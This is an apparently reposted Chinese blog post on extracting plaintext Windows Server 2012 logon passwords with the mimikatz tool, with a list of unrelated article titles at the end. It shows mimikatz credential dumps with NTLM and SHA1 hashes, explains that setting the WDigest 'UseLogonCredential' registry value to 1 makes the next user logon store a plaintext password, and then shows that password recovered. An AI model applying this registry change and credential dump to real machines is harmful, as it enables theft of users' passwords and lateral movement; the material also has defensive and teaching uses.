windows 2012 抓明文密码方法

默认配置是抓不到明文密码了，神器mimikatz显示Password为null

Authentication
Id
:
0
;
121279
(00000000:0001d9bf)

Session
:
Interactive
from
1

User
Name
: mickey

Domain
: WIN-B054LAOH5FC

Logon
Server
: WIN-B054LAOH5FC

Logon
Time
:
2014/2/7
16:13:37

SID : S-1-5-21-3697557613-2315859964-140861748-1001

msv :

[00000003]
Primary

*
Username
: mickey

*
Domain
: WIN-B054LAOH5FC

* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0

* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709

[00010000]
CredentialKeys

* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0

* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709

tspkg :

wdigest :

*
Username
: mickey

*
Domain
: WIN-B054LAOH5FC

*
Password
:
(null)

kerberos :

*
Username
: mickey

*
Domain
: WIN-B054LAOH5FC

*
Password
:
(null)

ssp : KO

credman :

需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1，类型为DWORD 32才可以，然后下次用户再登录，就能记录到明文密码了。

Authentication
Id
:
0
;
2506062
(00000000:00263d4e)

Session
:
Interactive
from
2

User
Name
: mickey

Domain
: WIN-B054LAOH5FC

Logon
Server
: WIN-B054LAOH5FC

Logon
Time
:
2015/5/11
11:47:35

SID : S-1-5-21-3697557613-2315859964-140861748-1001

msv :

[00010000]
CredentialKeys

* NTLM : ad12521316a18d2172f20db07674c278

* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c

[00000003]
Primary

*
Username
: mickey

*
Domain
: WIN-B054LAOH5FC

* NTLM : ad12521316a18d2172f20db07674c278

* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c

tspkg :

wdigest :

*
Username
: mickey

*
Domain
: WIN-B054LAOH5FC

*
Password
:
AGeisNBVeryNB@wooyun.org

参考链接：http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html

[原文地址]

最新文章

1. Block产生的内存泄露，以及解决方法
2. My安卓知识5--百度地图api的使用，周边信息检索
3. bitmap转化base64
4. RequireJS源码初探
5. xampp 用phpmyadmin在页面上修改密码后，无法登陆，密码没问题
6. URL List
7. 【Sublime Text 3】
8. Windows 8.1 归档 —— Step 3 软件的选择与安装
9. MVC 部署出现错误未能写入输出文件xxxxxxx.
10. Dashboards (Android)
11. stm32 smartcard调试--不用st8024
12. 创建android 模拟器并在cmd中打开
13. mac os x在PC上安装
14. 操作系统层面聊聊BIO，NIO和AIO (epoll)
15. js post下载相当于 location.href
16. 看开源代码利器—用Graphviz + CodeViz生成C/C++函数调用图(call graph) - 转
17. BBS--后台管理页面，编辑文章,xss攻击
18. 【第三十一章】 elk（2）- 第二种架构（最常用架构）
19. 查找ipa包，删除接的ipa包
20. thinkPHP的几个系统常量

热门文章

1. Travelling Fee（Dijlstra——最短路问题变型）
2. dom操作------创建节点/插入节点
3. .29-浅析webpack源码之doResolve事件流(1)
4. C# winform 无边框 窗体的拖动
5. Nodejs+Express构建网站
6. C# 数组深拷贝
7. iOS: Designated Initializer（指定初始化函数）
8. a 链接点击下载
9. 1.String、StringBuffer与StringBuilder之间区别
10. centos7下采用Nginx+uwsgi来部署django